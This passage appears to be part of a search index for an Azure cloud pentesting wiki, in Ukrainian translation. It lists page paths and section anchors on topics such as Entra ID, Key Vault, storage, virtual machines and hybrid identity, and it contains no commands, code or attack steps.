-security/az-services/az-azuread.html#Застосунки","pentesting-cloud/azure-security/az-services/az-azuread.html#Керовані-ідентичності","pentesting-cloud/azure-security/az-services/az-azuread.html#Ролі-azure","pentesting-cloud/azure-security/az-services/az-azuread.html#Ролі-entra-id","pentesting-cloud/azure-security/az-services/az-azuread.html#Пристрої","pentesting-cloud/azure-security/az-services/az-azuread.html#Адміністративні-одиниці","pentesting-cloud/azure-security/az-services/az-azuread.html#Підвищення-привілеїв-entra-id","pentesting-cloud/azure-security/az-services/az-azuread.html#Підвищення-привілеїв-azure","pentesting-cloud/azure-security/az-services/az-azuread.html#Захисні-механізми","pentesting-cloud/azure-security/az-services/az-azuread.html#Управління-привілейованими-ідентичностями-pim","pentesting-cloud/azure-security/az-services/az-azuread.html#Політики-умовного-доступу","pentesting-cloud/azure-security/az-services/az-azuread.html#Захист-ідентичності-entra","pentesting-cloud/azure-security/az-services/az-azuread.html#Захист-паролів-entra","pentesting-cloud/azure-security/az-services/az-azuread.html#Посилання","pentesting-cloud/azure-security/az-services/az-acr.html#az---acr","pentesting-cloud/azure-security/az-services/az-acr.html#Основна-інформація","pentesting-cloud/azure-security/az-services/az-acr.html#Перерахування","pentesting-cloud/azure-security/az-services/az-application-proxy.html#az---application-proxy","pentesting-cloud/azure-security/az-services/az-application-proxy.html#Основна-інформація","pentesting-cloud/azure-security/az-services/az-application-proxy.html#Перерахування","pentesting-cloud/azure-security/az-services/az-application-proxy.html#Посилання","pentesting-cloud/azure-security/az-services/az-arm-templates.html#az---arm-templates--deployments","pentesting-cloud/azure-security/az-services/az-arm-templates.html#Основна-інформація","pentesting-cloud/azure-security/az-services/az-arm-templates.html#Історія","pentesting-cloud/azure-security/az-services/az-arm-templates.html#Пошук-чутливої-інформації","pentesting-cloud/azure-security/az-services/az-arm-templates.html#Посилання","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#az---automation-accounts","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#basic-information","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#settings","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#runbooks--jobs","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#schedules--webhooks","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#source-control","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#runtime-environments","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#hybrid-worker-groups","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#state-configuration-sc","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#enumeration","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#Підвищення-Привілеїв-та-Постексплуатація","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#Посилання","pentesting-cloud/azure-security/az-services/az-app-services.html#az---app-services","pentesting-cloud/azure-security/az-services/az-app-services.html#app-service-basic-information","pentesting-cloud/azure-security/az-services/az-app-services.html#basic-authentication","pentesting-cloud/azure-security/az-services/az-app-services.html#kudu","pentesting-cloud/azure-security/az-services/az-app-services.html#sources","pentesting-cloud/azure-security/az-services/az-app-services.html#webjobs","pentesting-cloud/azure-security/az-services/az-app-services.html#slots","pentesting-cloud/azure-security/az-services/az-app-services.html#azure-function-apps","pentesting-cloud/azure-security/az-services/az-app-services.html#enumeration","pentesting-cloud/azure-security/az-services/az-app-services.html#Приклади-для-створення-веб-додатків","pentesting-cloud/azure-security/az-services/az-app-services.html#python-з-локального","pentesting-cloud/azure-security/az-services/az-app-services.html#python-з-github","pentesting-cloud/azure-security/az-services/az-app-services.html#Підвищення-привілеїв","pentesting-cloud/azure-security/az-services/az-app-services.html#Посилання","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#az---cloud-shell","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#azure-cloud-shell","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#Основні-функції","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#Фішинг-у-cloud-shell","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#Знайти-та-заборонити-автоматичні-облікові-записи-зберігання-cloud-shell","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#references","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#persistence","pentesting-cloud/azure-security/az-services/az-container-registry.html#az---container-registry","pentesting-cloud/azure-security/az-services/az-container-registry.html#Основна-інформація","pentesting-cloud/azure-security/az-services/az-container-registry.html#Дозволи","pentesting-cloud/azure-security/az-services/az-container-registry.html#Аутентифікація","pentesting-cloud/azure-security/az-services/az-container-registry.html#Шифрування","pentesting-cloud/azure-security/az-services/az-container-registry.html#Мережа","pentesting-cloud/azure-security/az-services/az-container-registry.html#microsoft-defender-для-cloud","pentesting-cloud/azure-security/az-services/az-container-registry.html#Мяке-видалення","pentesting-cloud/azure-security/az-services/az-container-registry.html#Вебхуки","pentesting-cloud/azure-security/az-services/az-container-registry.html#Підключені-реєстри","pentesting-cloud/azure-security/az-services/az-container-registry.html#Запуски-та-Завдання","pentesting-cloud/azure-security/az-services/az-container-registry.html#cache","pentesting-cloud/azure-security/az-services/az-container-registry.html#enumeration","pentesting-cloud/azure-security/az-services/az-container-registry.html#Підвищення-Привілеїв-та-Після-Експлуатації","pentesting-cloud/azure-security/az-services/az-container-registry.html#Посилання","pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.html#az---container-instances","pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.html#Основна-інформація","pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.html#Конфігурації","pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.html#Перерахування","pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.html#Підвищення-Привілеїв-та-Після-Експлуатації","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#az---cosmosdb","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#azure-cosmosdb","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#nosql","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#mongodb","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#Посилання","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#Підвищення-привілеїв","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#Постексплуатація","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#todo","pentesting-cloud/azure-security/az-services/az-defender.html#az---defender","pentesting-cloud/azure-security/az-services/az-defender.html#microsoft-defender-for-cloud","pentesting-cloud/azure-security/az-services/az-defender.html#key-features","pentesting-cloud/azure-security/az-services/az-defender.html#microsoft-defender-easm","pentesting-cloud/azure-security/az-services/az-file-shares.html#az---file-shares","pentesting-cloud/azure-security/az-services/az-file-shares.html#Основна-інформація","pentesting-cloud/azure-security/az-services/az-file-shares.html#Рівні-доступу","pentesting-cloud/azure-security/az-services/az-file-shares.html#Резервні-копії","pentesting-cloud/azure-security/az-services/az-file-shares.html#Підтримувані-аутентифікації-через-smb","pentesting-cloud/azure-security/az-services/az-file-shares.html#Перерахування","pentesting-cloud/azure-security/az-services/az-file-shares.html#connection","pentesting-cloud/azure-security/az-services/az-file-shares.html#Регулярна-енумерація-сховища-ключі-доступу-sas","pentesting-cloud/azure-security/az-services/az-file-shares.html#Підвищення-привілеїв","pentesting-cloud/azure-security/az-services/az-file-shares.html#Постексплуатація","pentesting-cloud/azure-security/az-services/az-file-shares.html#Персистентність","pentesting-cloud/azure-security/az-services/az-function-apps.html#az---function-apps","pentesting-cloud/azure-security/az-services/az-function-apps.html#Основна-інформація","pentesting-cloud/azure-security/az-services/az-function-apps.html#Різні-плани","pentesting-cloud/azure-security/az-services/az-function-apps.html#Сховища","pentesting-cloud/azure-security/az-services/az-function-apps.html#Мережа","pentesting-cloud/azure-security/az-services/az-function-apps.html#Налаштування-function-app-та-змінні-середовища","pentesting-cloud/azure-security/az-services/az-function-apps.html#Пісочниця-функцій","pentesting-cloud/azure-security/az-services/az-function-apps.html#Керовані-ідентичності-та-метадані","pentesting-cloud/azure-security/az-services/az-function-apps.html#Ключі-доступу","pentesting-cloud/azure-security/az-services/az-function-apps.html#Основна-аутентифікація","pentesting-cloud/azure-security/az-services/az-function-apps.html#Розгортання-на-основі-github","pentesting-cloud/azure-security/az-services/az-function-apps.html#container-based-deployments","pentesting-cloud/azure-security/az-services/az-function-apps.html#enumeration","pentesting-cloud/azure-security/az-services/az-function-apps.html#Підвищення-Привілеїв","pentesting-cloud/azure-security/az-services/az-function-apps.html#Посилання","pentesting-cloud/azure-security/az-services/intune.html#az---intune","pentesting-cloud/azure-security/az-services/intune.html#Основна-інформація","pentesting-cloud/azure-security/az-services/intune.html#Хмара---Локально","pentesting-cloud/azure-security/az-services/intune.html#references","pentesting-cloud/azure-security/az-services/az-keyvault.html#az---key-vault","pentesting-cloud/azure-security/az-services/az-keyvault.html#Основна-інформація","pentesting-cloud/azure-security/az-services/az-keyvault.html#Контроль-доступу","pentesting-cloud/azure-security/az-services/az-keyvault.html#Вбудовані-ролі-rbac-key-vault","pentesting-cloud/azure-security/az-services/az-keyvault.html#Мережевий-доступ","pentesting-cloud/azure-security/az-services/az-keyvault.html#Захист-від-видалення","pentesting-cloud/azure-security/az-services/az-keyvault.html#Перерахування","pentesting-cloud/azure-security/az-services/az-keyvault.html#Підвищення-Привілеїв","pentesting-cloud/azure-security/az-services/az-keyvault.html#Після-Експлуатації","pentesting-cloud/azure-security/az-services/az-logic-apps.html#az---logic-apps","pentesting-cloud/azure-security/az-services/az-logic-apps.html#Основна-інформація","pentesting-cloud/azure-security/az-services/az-logic-apps.html#Приклади","pentesting-cloud/azure-security/az-services/az-logic-apps.html#Візуалізація-logicapp","pentesting-cloud/azure-security/az-services/az-logic-apps.html#Захист-від-ssrf","pentesting-cloud/azure-security/az-services/az-logic-apps.html#Варіанти-хостингу","pentesting-cloud/azure-security/az-services/az-logic-apps.html#Ключові-особливості","pentesting-cloud/azure-security/az-services/az-logic-apps.html#Один-робочий-процес","pentesting-cloud/azure-security/az-services/az-logic-apps.html#Перерахування","pentesting-cloud/azure-security/az-services/az-logic-apps.html#Інтеграційні-облікові-записи","pentesting-cloud/azure-security/az-services/az-logic-apps.html#Підвищення-Привілеїв","pentesting-cloud/azure-security/az-services/az-logic-apps.html#Після-Експлуатації","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#az---Групи-управління-Підписки-та-Ресурсні-групи","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#Групи-управління","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#Перерахування","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#Підписки","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#Перерахування-1","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#Групи-ресурсів","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#Перерахування-2","pentesting-cloud/azure-security/az-services/az-monitoring.html#az---Моніторинг","pentesting-cloud/azure-security/az-services/az-monitoring.html#entra-id---Журнали","pentesting-cloud/azure-security/az-services/az-monitoring.html#entra-id---Системи-журналів","pentesting-cloud/azure-security/az-services/az-monitoring.html#azure-monitor","pentesting-cloud/azure-security/az-services/az-monitoring.html#Робочі-простори-log-analytics","pentesting-cloud/azure-security/az-services/az-monitoring.html#Перерахування","pentesting-cloud/azure-security/az-services/az-monitoring.html#entra-id","pentesting-cloud/azure-security/az-services/az-monitoring.html#azure-monitor-1","pentesting-cloud/azure-security/az-services/az-mysql.html#az---mysql-databases","pentesting-cloud/azure-security/az-services/az-mysql.html#azure-mysql","pentesting-cloud/azure-security/az-services/az-mysql.html#key-features","pentesting-cloud/azure-security/az-services/az-mysql.html#enumeration","pentesting-cloud/azure-security/az-services/az-mysql.html#Зєднання","pentesting-cloud/azure-security/az-services/az-mysql.html#Підвищення-Привілеїв","pentesting-cloud/azure-security/az-services/az-mysql.html#Після-Експлуатації","pentesting-cloud/azure-security/az-services/az-mysql.html#todo","pentesting-cloud/azure-security/az-services/az-postgresql.html#az---postgresql-databases","pentesting-cloud/azure-security/az-services/az-postgresql.html#azure-postgresql","pentesting-cloud/azure-security/az-services/az-postgresql.html#key-features","pentesting-cloud/azure-security/az-services/az-postgresql.html#enumeration","pentesting-cloud/azure-security/az-services/az-postgresql.html#Зєднання","pentesting-cloud/azure-security/az-services/az-postgresql.html#references","pentesting-cloud/azure-security/az-services/az-postgresql.html#Підвищення-Привілеїв","pentesting-cloud/azure-security/az-services/az-postgresql.html#Постексплуатація","pentesting-cloud/azure-security/az-services/az-postgresql.html#todo","pentesting-cloud/azure-security/az-services/az-queue.html#az---queue-storage","pentesting-cloud/azure-security/az-services/az-queue.html#Основна-інформація","pentesting-cloud/azure-security/az-services/az-queue.html#Перерахування","pentesting-cloud/azure-security/az-services/az-queue.html#Підвищення-Привілеїв","pentesting-cloud/azure-security/az-services/az-queue.html#Постексплуатація","pentesting-cloud/azure-security/az-services/az-queue.html#Персистентність","pentesting-cloud/azure-security/az-services/az-queue.html#Посилання","pentesting-cloud/azure-security/az-services/az-sentinel.html#az---defender","pentesting-cloud/azure-security/az-services/az-sentinel.html#microsoft-sentinel","pentesting-cloud/azure-security/az-services/az-sentinel.html#Налаштування-microsoft-sentinel","pentesting-cloud/azure-security/az-services/az-sentinel.html#Основні-функції","pentesting-cloud/azure-security/az-services/az-servicebus.html#az---service-bus-enum","pentesting-cloud/azure-security/az-services/az-servicebus.html#service-bus","pentesting-cloud/azure-security/az-services/az-servicebus.html#key-concepts","pentesting-cloud/azure-security/az-services/az-servicebus.html#Розширені-функції","pentesting-cloud/azure-security/az-services/az-servicebus.html#Локальна-аутентифікація","pentesting-cloud/azure-security/az-services/az-servicebus.html#Правила-авторизації--Політика-sas","pentesting-cloud/azure-security/az-services/az-servicebus.html#Перерахування","pentesting-cloud/azure-security/az-services/az-servicebus.html#Підвищення-Привілеїв","pentesting-cloud/azure-security/az-services/az-servicebus.html#Після-Експлуатації","pentesting-cloud/azure-security/az-services/az-servicebus.html#Посилання","pentesting-cloud/azure-security/az-services/az-sql.html#az---sql","pentesting-cloud/azure-security/az-services/az-sql.html#azure-sql","pentesting-cloud/azure-security/az-services/az-sql.html#sql-server-security-features","pentesting-cloud/azure-security/az-services/az-sql.html#azure-sql-database","pentesting-cloud/azure-security/az-services/az-sql.html#Функції-безпеки-sql-бази-даних","pentesting-cloud/azure-security/az-services/az-sql.html#azure-sql-Керовані-екземпляри","pentesting-cloud/azure-security/az-services/az-sql.html#azure-sql-Віртуальні-машини","pentesting-cloud/azure-security/az-services/az-sql.html#Перерахування","pentesting-cloud/azure-security/az-services/az-sql.html#Підключення-та-виконання-sql-запитів","pentesting-cloud/azure-security/az-services/az-sql.html#references","pentesting-cloud/azure-security/az-services/az-sql.html#Підвищення-привілеїв","pentesting-cloud/azure-security/az-services/az-sql.html#Постексплуатація","pentesting-cloud/azure-security/az-services/az-sql.html#Постійність","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#az---static-web-apps","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#static-web-apps-basic-information","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#deployment-authentication","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#web-app-basic-authentication","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#Маршрути-та-ролі","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#Керовані-ідентичності","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#Перерахування","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#Приклади-для-створення-веб-додатків","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#Підвищення-привілеїв-та-постексплуатація","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#Посилання","pentesting-cloud/azure-security/az-services/az-storage.html#az---Облікові-записи-зберігання-та-блоби","pentesting-cloud/azure-security/az-services/az-storage.html#Основна-інформація","pentesting-cloud/azure-security/az-services/az-storage.html#Кінцеві-точки-зберігання","pentesting-cloud/azure-security/az-services/az-storage.html#Публічне-відкриття","pentesting-cloud/azure-security/az-services/az-storage.html#Підключення-до-зберігання","pentesting-cloud/azure-security/az-services/az-storage.html#Доступ-до-зберігання","pentesting-cloud/azure-security/az-services/az-storage.html#rbac","pentesting-cloud/azure-security/az-services/az-storage.html#Ключі-доступу","pentesting-cloud/azure-security/az-services/az-storage.html#Спільні-ключі-та-легкі-спільні-ключі","pentesting-cloud/azure-security/az-services/az-storage.html#shared-access-signature--sas","pentesting-cloud/azure-security/az-services/az-storage.html#Підтримка-sftp-для-azure-blob-storage","pentesting-cloud/azure-security/az-services/az-storage.html#Ключові-особливості","pentesting-cloud/azure-security/az-services/az-storage.html#Вимоги-до-налаштування","pentesting-cloud/azure-security/az-services/az-storage.html#Дозволи","pentesting-cloud/azure-security/az-services/az-storage.html#Перерахування","pentesting-cloud/azure-security/az-services/az-storage.html#Файлові-спільноти","pentesting-cloud/azure-security/az-services/az-storage.html#Підвищення-привілеїв","pentesting-cloud/azure-security/az-services/az-storage.html#Постексплуатація","pentesting-cloud/azure-security/az-services/az-storage.html#Персистентність","pentesting-cloud/azure-security/az-services/az-storage.html#Посилання","pentesting-cloud/azure-security/az-services/az-table-storage.html#az---table-storage","pentesting-cloud/azure-security/az-services/az-table-storage.html#Основна-інформація","pentesting-cloud/azure-security/az-services/az-table-storage.html#Ключі","pentesting-cloud/azure-security/az-services/az-table-storage.html#Перерахування","pentesting-cloud/azure-security/az-services/az-table-storage.html#Підвищення-привілеїв","pentesting-cloud/azure-security/az-services/az-table-storage.html#Постексплуатація","pentesting-cloud/azure-security/az-services/az-table-storage.html#Персистентність","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#az---virtual-desktop","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#azure-virtual-desktop","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#host-pools","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#session-hosts","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#application-groups","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#workspaces--connections","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#managed-identities","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#enumeration","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#Привілегії","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#Після-експлуатації-та-стійкість","pentesting-cloud/azure-security/az-services/vms/index.html#az---Віртуальні-машини-та-мережа","pentesting-cloud/azure-security/az-services/vms/index.html#Основна-інформація-про-мережі-azure","pentesting-cloud/azure-security/az-services/vms/index.html#Основна-інформація-про-ВМ","pentesting-cloud/azure-security/az-services/vms/index.html#Налаштування-безпеки","pentesting-cloud/azure-security/az-services/vms/index.html#Диски-та-знімки","pentesting-cloud/azure-security/az-services/vms/index.html#Зображення-Галерея-зображень-та-Точки-відновлення","pentesting-cloud/azure-security/az-services/vms/index.html#azure-site-recovery","pentesting-cloud/azure-security/az-services/vms/index.html#azure-bastion","pentesting-cloud/azure-security/az-services/vms/index.html#metadata","pentesting-cloud/azure-security/az-services/vms/index.html#vm-enumeration","pentesting-cloud/azure-security/az-services/vms/index.html#Виконання-коду-у-ВМ","pentesting-cloud/azure-security/az-services/vms/index.html#Розширення-ВМ","pentesting-cloud/azure-security/az-services/vms/index.html#Відповідні-розширення-ВМ","pentesting-cloud/azure-security/az-services/vms/index.html#Застосунки-vm","pentesting-cloud/azure-security/az-services/vms/index.html#Дані-користувача","pentesting-cloud/azure-security/az-services/vms/index.html#Користувацькі-дані","pentesting-cloud/azure-security/az-services/vms/index.html#Запустити-команду","pentesting-cloud/azure-security/az-services/vms/index.html#Підвищення-Привілеїв","pentesting-cloud/azure-security/az-services/vms/index.html#Неавтентифікований-Доступ","pentesting-cloud/azure-security/az-services/vms/index.html#Після-Експлуатації","pentesting-cloud/azure-security/az-services/vms/index.html#Постійність","pentesting-cloud/azure-security/az-services/vms/index.html#Посилання","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#az---azure-network","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#Основна-інформація","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#Віртуальна-мережа-vnet-та-підмережі","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#Перерахування","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#Групи-безпеки-мережі-nsg","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#Перерахування-1","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-firewall","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-route-tables","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-1","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-private-link","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-2","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-service-endpoints","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-3","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#Відмінності-між-service-endpoints-та-private-links","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-front-door-afd--afd-waf","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-4","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-application-gateway-та-azure-application-gateway-waf","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#Перерахування-2","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-hub-spoke--vnet-peering","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-5","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#site-to-site-vpn","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-6","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-expressroute","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-7","pentesting-cloud/azure-security/az-permissions-for-a-pentest.html#az---permissions-for-a-pentest","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html#az---Бічний-Рух-Хмара---На-місці","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html#az---Бічний-Рух-Хмара---На-місці-1","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html#На-місцевих-машинах-підключених-до-хмари","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html#Токени-та-обмеження","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html#Техніки-Півотування","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html#Посилання","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/index.html#az-ad-connect---Гібридна-ідентичність","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/index.html#Основна-інформація","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.html#az--Синхронізація-нових-користувачів","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.html#Синхронізація-користувачів-azuread-до-on-prem-для-ескалації-з-on-prem-до-azuread","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.html#references","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.html#az---default-applications","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.html#az---cloud-kerberos-trust","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.html#Основна-інформація","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.html#Довіра","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.html#kerberos-tgt","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.html#ntlm","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.html#Зловживання-cloud-kerberos-trust-для-отримання-прав-domain-admin","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.html#Передумови-атаки","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.html#Повна-атака","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.html#az---Федерація","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.html#Основна-інформація","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.html#Півтування","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.html#golden-saml","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.html#on-prem---хмара","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.html#Посилання","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.html#az---phs---password-hash-sync","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.html#Основна-інформація","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.html#Півотування","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.html#Знаходження--сервера-azure-ad-connect","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.html#Зловживання-msol_","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.html#Зловживання-sync_","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.html#seamless-sso","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.html#references","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.html#az---pta---pass-through-authentication","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.html#Основна-інформація","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.html#Потік-аутентифікації","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.html#on-prem---cloud","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.html#Хмара---На-місці","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.html#Безшовний-sso","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.html#Посилання","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.html#az---seamless-sso","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.html#Основна-інформація","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.html#Локальний---хмара","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.html#on-prem---cloud-через-обмежену-делегацію-на-основі-ресурсів","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.html#Посилання","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.html#az---arc-вразливий-gpo-deploy-script","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.html#Визначення-проблем","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.html#exploit","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.html#references","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#az---Локальні-Облікові-Дані-Хмари","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#Локальне-Зберігання-Токенів-та-Розгляд-Безпеки","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#azure-cli-Інтерфейс-Командного-Рядка","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#azure-powershell","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#Автоматичні-Інструменти-для-їх-Пошуку","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#Рекомендації-з-Безпеки","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-p